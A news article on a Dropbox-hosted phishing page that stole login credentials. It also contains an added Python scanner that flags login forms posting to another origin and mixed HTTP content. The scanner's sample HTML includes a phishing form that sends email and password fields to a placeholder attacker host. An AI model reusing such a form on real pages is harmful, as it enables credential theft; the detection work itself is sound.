Hackers Used Dropbox For Phishing Attack


After the massive Dropbox credentials leak, everybody started asking "How were those passwords leaked?". Here is one of the methods hackers used to steal Dropbox credentials.

Security firm Symantec said it has detected a batch of phishing emails advising recipients that they've been sent a large file and including a link to a Dropbox-hosted page.

The scam uses an email (with the subject "important") claiming that the recipient has been sent a document that is too big to be sent by email, or cannot be sent by email for security reasons. Instead, the email claims, the document can be viewed by clicking on the link included in the message. However, the link opens a fake Dropbox login page, hosted on Dropbox itself.

Nick Johnston from Symantec said, "The fake login page is hosted on Dropbox's user content domain (like shared photos and other files are) and is served over SSL, making the attack more dangerous and convincing."

Hackers copied the exact layout and design of the Dropbox login page, and they also included logos of popular web-based email services, suggesting that users can log in with those credentials as well.

Since the fake page and the submitted credentials both travel over SSL, the browser shows no security warning when the credentials are submitted. The fake page uses a simple PHP script to send the user's credentials to the hackers' server. After the submission, the PHP script redirects the user to the real Dropbox login page.

Johnston said, "Some resources on the fake page (such as images or style sheets) are not served over SSL. Using non-SSL resources on a page served over SSL shows warnings in recent versions of some browsers. The prominence of the warning varies from browser to browser; some browsers simply change the padlock symbol shown in the address bar, whereas others include a small banner at the top of the page. Users may not notice or understand these security warnings or the associated implications."
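The two traits described above, credentials posted to a server other than the one hosting the page and non-SSL resources on an SSL page, can be checked mechanically when triaging a reported page. The following is an added defender-side example, not code from the original post or from Symantec or Dropbox: it parses the HTML of a login page with Python's standard library, flags any password form whose action leaves the page's own origin, and lists sub-resources loaded over plain HTTP. The sample page, its URL and every domain name in it are constructed placeholders.

```python
"""
Added example (not from the original article): scan a login page's HTML for two
traits of the Dropbox-hosted phishing page the article describes:
  1. a form containing a password field that posts credentials to a different
     origin than the page itself (the article's "simple php script" on the
     attackers' server);
  2. mixed content: images, style sheets or scripts fetched over plain HTTP
     from a page served over SSL.
All domain names and the sample HTML below are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _LoginPageScanner(HTMLParser):
    """Collect form actions, whether each form has a password field, and sub-resource URLs."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []       # dicts: {"action": absolute URL, "has_password": bool}
        self.resources = []   # absolute URLs of img/script src and link href

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A missing or relative action resolves against the page URL, as a browser does.
            self.forms.append({"action": urljoin(self.page_url, a.get("action") or ""),
                               "has_password": False})
        elif tag == "input" and (a.get("type") or "").lower() == "password" and self.forms:
            self.forms[-1]["has_password"] = True
        elif tag in ("img", "script") and a.get("src"):
            self.resources.append(urljoin(self.page_url, a["src"]))
        elif tag == "link" and a.get("href"):
            self.resources.append(urljoin(self.page_url, a["href"]))


def scan_login_page(page_url, html):
    """Return findings for a page served from page_url: offsite credential posts and mixed content."""
    scanner = _LoginPageScanner(page_url)
    scanner.feed(html)
    page = urlsplit(page_url)
    findings = {"offsite_credential_posts": [], "mixed_content": []}
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        action = urlsplit(form["action"])
        # Credentials leaving the page's own scheme+host is the phishing tell.
        # (Heuristic: some legitimate sites post logins to a dedicated auth host.)
        if (action.scheme, action.netloc) != (page.scheme, page.netloc):
            findings["offsite_credential_posts"].append(form["action"])
    if page.scheme == "https":
        for url in scanner.resources:
            if urlsplit(url).scheme == "http":
                findings["mixed_content"].append(url)
    return findings


def is_suspicious(findings):
    """True if either trait was found."""
    return bool(findings["offsite_credential_posts"] or findings["mixed_content"])


# Constructed sample (placeholder domains): an HTTPS-hosted page that posts
# credentials to another host and pulls a style sheet and a logo over plain HTTP.
SAMPLE_PAGE_URL = "https://user-content.example-filehost.test/u/123/login.html"
SAMPLE_HTML = """
<html><head>
<link rel="stylesheet" href="http://static.example-filehost.test/login.css">
</head><body>
<img src="http://static.example-filehost.test/logo.png">
<form method="post" action="http://harvest.example-attacker.test/collect.php">
  <input type="email" name="login_email">
  <input type="password" name="login_password">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

if __name__ == "__main__":
    result = scan_login_page(SAMPLE_PAGE_URL, SAMPLE_HTML)
    for kind, urls in result.items():
        for url in urls:
            print(f"{kind}: {url}")
    print("suspicious:", is_suspicious(result))
```

The offsite-post check is a heuristic rather than proof: a page that posts credentials to a third host deserves a closer look, not an automatic verdict, since some legitimate sites route logins through a separate authentication host. The mixed-content check mirrors what the browser warnings in the quote above react to.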

Symantec reported the phishing page to Dropbox, and they immediately took the page down. If you know of any phishing pages like this, you can report them to abuse@dropbox.com.
